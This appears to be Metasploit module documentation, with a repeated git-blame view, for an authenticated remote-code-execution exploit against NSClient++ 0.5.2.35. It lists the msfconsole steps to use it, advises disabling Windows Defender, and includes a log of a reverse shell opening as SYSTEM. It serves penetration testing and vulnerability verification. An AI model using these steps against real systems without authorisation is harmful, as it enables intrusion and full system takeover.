documentation/modules/exploit/windows/http/nscp_authenticated_rce.md

## Vulnerable Application

### Description

This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell.
For this module to work, both web interface of NSClient++ and `ExternalScripts` feature should be enabled.

### Installation

A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with
this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface
and the `ExternalScripts` feature to allow the exploit to work.

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/windows/http/nscp_authenticated_rce`
3. `set RHOST <target_host>`
4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
5. `check` to check if the targeted NSClient++ is vulnerable
6. `set payload <choose_a_payload>` to set a specific payload to send
7. `run` the module to exploit the vulnerability and start a shell

## Options

### PASSWORD

Set the PASSWORD of the admin account of NSClient++.

## Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted).
See the following output :

```
msf6 > use nscp_authenticated_rce
[*] Using configured payload windows/x64/shell_reverse_tcp
msf6 exploit(nscp_authenticated_rce) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf6 exploit(nscp_authenticated_rce) > set password easypassword
password => easypassword
msf6 exploit(nscp_authenticated_rce) > exploit

[*] Started reverse TCP handler on y.y.y.y:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[+] The target is vulnerable. External scripts feature enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: zqlmwevxef)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200

C:\Program Files\NSClient++>whoami
whoami
nt authority\system
```
rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			`## Vulnerable Application`

			`### Description`
initial commit 2021-06-07 14:39:10 +02:00
Update documentation/modules/exploit/windows/http/nscp_authenticated_rce.md 2021-06-08 16:35:10 +02:00			`This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell.`
rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			For this module to work, both web interface of NSClient++ and `ExternalScripts` feature should be enabled.
initial commit 2021-06-07 14:39:10 +02:00
rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			`### Installation`
initial commit 2021-06-07 14:39:10 +02:00
rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			`A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with`
			`this [installation guide](https://docs.nsclient.org/api/rest/) to complete the installation. Don't forget to enable the web interface`
			and the `ExternalScripts` feature to allow the exploit to work.
initial commit 2021-06-07 14:39:10 +02:00
			`## Verification Steps`

			`List the steps needed to make sure this thing works`

Update documentation/modules/exploit/windows/http/nscp_authenticated_rce.md 2021-06-08 15:16:12 +02:00			1. Start `msfconsole`
			2. `use exploit/windows/http/nscp_authenticated_rce`
			3. `set RHOST <target_host>`
			4. `set PASSWORD <admin_password>` to set the admin password of NSClient++ web interface
			5. `check` to check if the targeted NSClient++ is vulnerable
			6. `set payload <choose_a_payload>` to set a specific payload to send
			7. `run` the module to exploit the vulnerability and start a shell
initial commit 2021-06-07 14:39:10 +02:00
			`## Options`

rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			`### PASSWORD`
initial commit 2021-06-07 14:39:10 +02:00
Update documentation/modules/exploit/windows/http/nscp_authenticated_rce.md 2021-06-08 15:16:12 +02:00			`Set the PASSWORD of the admin account of NSClient++.`
add scenario + small changes 2021-06-09 08:59:35 +02:00
			`## Scenarios`

rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			`This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted).`
			`See the following output :`
add scenario + small changes 2021-06-09 08:59:35 +02:00
			```
			`msf6 > use nscp_authenticated_rce`
			`[*] Using configured payload windows/x64/shell_reverse_tcp`
			`msf6 exploit(nscp_authenticated_rce) > set RHOST x.x.x.x`
			`RHOST => x.x.x.x`
			`msf6 exploit(nscp_authenticated_rce) > set password easypassword`
			`password => easypassword`
			`msf6 exploit(nscp_authenticated_rce) > exploit`

			`[*] Started reverse TCP handler on y.y.y.y:4444`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ`
			`[+] The target is vulnerable. External scripts feature enabled !`
			`[*] Configuring Script with Specified Payload . . .`
			`[*] Added External Script (name: zqlmwevxef)`
			`[*] Saving Configuration . . .`
			`[*] Reloading Application . . .`
			`[*] Waiting for Application to reload . . .`
			`[*] Triggering payload, should execute shortly . . .`
			`[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200`

			`C:\Program Files\NSClient++>whoami`
			`whoami`
			`nt authority\system`
rubocop for documentation is ok 2021-06-09 09:08:19 +02:00			```